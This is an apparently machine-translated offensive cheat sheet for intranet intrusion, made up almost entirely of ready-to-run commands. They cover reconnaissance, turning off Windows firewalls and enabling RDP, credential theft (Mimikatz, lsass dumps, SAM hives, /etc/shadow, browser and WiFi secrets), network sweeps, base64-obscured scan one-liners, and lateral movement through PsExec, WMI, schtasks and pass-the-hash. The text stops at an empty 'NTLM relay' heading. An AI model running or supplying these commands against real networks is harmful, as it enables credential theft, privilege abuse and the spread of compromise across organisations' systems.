Intranet intrusion

system message

Basic Information

• Linux

#系统版本
uname -a
#开机时间
who -r
#进程列表
ps -aux
#历史命令
cat ~/.*sh_history
#本地服务
systemctl --type=service
#判断Docker
ls -la /.dockerenv
cat /proc/1/cgroup | grep docker

• Windows

#系统版本
systeminfo
#进程列表
tasklist
#全部盘符
fsutil fsinfo drives
#开机时间
net statistics workstation
#应用软件
wmic product get name,version
#本地服务
wmic service get name,pathname,startmode
#启动程序
wmic startup get caption,command,location
#PowerShell历史
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

User Info

• Linux

#在线用户
w || who
#用户列表
cat /etc/passwd | grep /bin/bash
#管理员组
cat /etc/passwd | awk -F: "\$3==0"

• Windows

#用户列表
net user
#在线用户
query user
#用户权限
whoami /all
#管理员组
net localgroup Administrators

Internet Information

• Linux

#ARP缓存
arp -a
#网络配置
ifconfig
#路由信息
route -n
#端口连接
netstat -pantu
#Hosts文件
cat /etc/hosts
#代理配置
env | grep -i proxy

• Windows

#ARP缓存
arp -a
#共享列表
net share
#路由信息
route print
#端口连接
netstat -nao
#网络配置
ipconfig /all
#DNS缓存
ipconfig /displaydns
#Hosts文件
type C:\Windows\System32\drivers\etc\hosts
#代理配置
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v Proxy*

Remote management

• Linux

#SSH端口
grep -Ei "Port [0-9]+" /etc/ssh/sshd_config
#SSH日志
last | grep -Eo "([0-9]{1,3}\.){3}[0-9]{1,3}" | sort -u
#SSH历史
find / -name known_hosts | xargs grep -Eho "([0-9]{1,3}\.){3}[0-9]{1,3}" | sort -u

• Windows

#RDP启用
wmic RDTOGGLE where ServerName="%COMPUTERNAME%" call SetAllowTSConnections 1
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
#RDP端口
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
#RDP历史
Get-ChildItem 'Registry::HKEY_USERS\*\Software\Microsoft\Terminal Server Client\Servers\*' 2> $null
#RDP日志
Get-EventLog Security -InstanceId 4624 | ?{$_.Message -match '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'} | %{$Matches.Values} | Sort -Unique

firewall

• Linux

• Windows

#查看状态
netsh advfirewall show allprofiles
#关闭服务
netsh firewall set opmode mode=disable
netsh advfirewall set allprofiles state off
#端口放行
netsh firewall add portopening name="RDP" mode=enable protocol=TCP port=3389
netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=TCP localport=3389
#程序放行
netsh firewall add allowedprogram name="File" mode=enable program="C:\File.exe"
netsh advfirewall firewall add rule name="File" dir=in action=allow program="C:\File.exe"

Credential collection

WiFi password

• Linux

cd /etc/NetworkManager/system-connections && grep -rH "psk=" | sed "s/psk=//"

• Windows

netsh wlan show profile name="WIFI名称" key=clear

Web records

• HackBrowserData

hack-browser-data -b all -f csv --cc --dir Temp

Hash Credentials

• Linux

cat /etc/shadow | awk -F: "length(\$2)>3"

• Windows

#Mimikatz
mimikatz "privilege::debug" "sekurlsa::logonpasswords" "exit"
#Reg+Mimikatz
reg save HKLM\SAM SAM.hive
reg save HKLM\SYSTEM SYSTEM.hive
mimikatz "lsadump::sam /sam:SAM.hive /system:SYSTEM.hive" "exit"
#ProcDump+Mimikatz
ProcDump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords full" "exit"
#开启Wdigest Auth
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

host detection

Ping to survive

• Linux

echo 192.168.0.{1..254} | xargs -n1 -P 10 ping -w 1 -c 1 | grep -i TTL | grep -Eo "([0-9]{1,3}\.){3}[0-9]{1,3}"

• Windows

for /L %I in (1, 1, 254) do @ping -w 1 -n 1 192.168.0.%I | findstr /I "TTL"

port scan

• Linux

for IP in 192.168.0.{1..254}; do echo -n "22,80,443,3389" | xargs -P 10 -d "," -i timeout 1 bash -c "echo >/dev/tcp/$IP/{} && echo '$IP:{} open'" 2>/dev/null; done

• Windows

ForEach($IP in (1..254|%{'192.168.1.'+$_})){ForEach($Port in 22,80,443,3389){$TCP=New-Object Net.Sockets.TcpClient;if($TCP.BeginConnect($IP,$Port,$NULL,$NULL).AsyncWaitHandle.WaitOne(300,$False)){$IP+':'+$Port+' open'}$TCP.Close()}}

Vulnerability Scan

• Linux

echo aHR0cDovL2V4YW1wbGUuY29t | base64 -d | xargs -P 10 -i timeout 3 bash -c 'curl -X POST -H "Content-Type: application/json" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64)" -d "$(echo eyJpZCI6IDEwfQ== | base64 -d)" -iks {} | grep -Eq "漏洞规则" && echo [+] {}'

• Windows

[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cDovL2V4YW1wbGUuY29t')).Split()|%{if((Invoke-WebRequest -Method POST -URI $_ -TimeoutSec 3 -Headers @{'Content-Type'='application/x-www-form-urlencoded';'User-Agent'='Mozilla/5.0 (Windows NT 10.0; Win64)'} -Body $([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('a2V5PXh4eA==')))|Select RawContent) -match '漏洞规则'){'[+] '+$_}} 2>$NULL

Lateral movement

IPC$pipeline

• IPC

net use \\192.168.1.1\IPC$ Password /user:Domain\User
net use \\192.168.1.1\IPC$ /del

• Sc

sc \\192.168.1.1 create StartUp binPath= "Shell"
sc \\192.168.1.1 start  StartUp
sc \\192.168.1.1 delete StartUp

• WMI

wmic /node:192.168.1.1 /user:Administrator /password:123456 process call create "Shell"

• PsExec

psexec -accepteula \\192.168.1.1 -u Administrator -p 123456 -s "Shell"

• WinRM

winrs -r:http://192.168.1.1:5985 -u:Administrator -p:123456 "Shell"

• Schtasks

schtasks /create /s 192.168.1.1 /u Administrator /p 123456 /tn StartUp /ru SYSTEM /sc onCE /st 12:00 /tr "Shell"
schtasks /run /s 192.168.1.1 /u Administrator /p 123456 /tn StartUp /i
schtasks /delete /s 192.168.1.1 /u Administrator /p 123456 /tn StartUp /f

hash pass

• Impacket

psexec.py  -hashes :32ed87bdb5fdc5e9cba88547376818d4 Administrator@192.168.1.1
wmiexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 Administrator@192.168.1.1
smbexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 Administrator@192.168.1.1

• Mimikatz

#PTK
mimikatz "privilege::debug" "sekurlsa::ekeys" "exit"
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WORKGROUP /aes256:32ed87bdb5fdc5e9cba88547376818d4" "exit"
#PTH
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WORKGROUP /ntlm:32ed87bdb5fdc5e9cba88547376818d4" "exit"
#RDP
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:WORKGROUP /ntlm:32ed87bdb5fdc5e9cba88547376818d4 \"/run:mstsc.exe /restrictedadmin\"" "exit"

bill passing

NTLM relay